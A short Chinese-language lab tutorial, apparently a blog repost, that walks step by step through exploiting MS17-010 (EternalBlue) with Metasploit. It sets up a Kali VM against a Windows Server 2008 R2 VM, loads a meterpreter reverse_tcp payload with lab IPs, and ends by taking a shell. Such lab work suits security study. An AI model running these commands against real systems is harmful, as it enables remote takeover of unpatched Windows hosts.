EternalBlue永恒之蓝ms17_010使用
-
實驗環境:VM Ware15;Kali Liunx;Windows Sercer 2008 R2
-
攻擊思路:
1.掃描靶機msf5 > use auxiliary/scanner/smb/smb_ms17_010
2.選擇exploituse exploit/windows/smb/ms17_010_eternalblue
3.選擇payloadset payload windows/x64/meterpreter/reverse_tcp
4.攻擊run/exploit -
獲取IP地址
Kali: ifconfig
Windows: ipconfig
- 啟動msf5
在kali終端輸入msfconsole
- 使用ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
Required欄為yes,則Current Setting欄內的值需要進行設置
- 選擇exploit
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
- 查看:show payloads
- 設置payload
set payload windows/x64/meterpreter/reverse_tcp
- 設置靶機和本機IP
set RHOSTS 192.168.177.132 //靶機IP(Windows)
set LHOST 192.168.177.130 //Kali Linux IP
- 攻擊run
[+]表示運行成功
- 獲取屏幕截圖和shell
總結
以上是生活随笔為你收集整理的EternalBlue永恒之蓝ms17_010使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: spring boot- JdbcTem
- 下一篇: SecureCRT分屏显示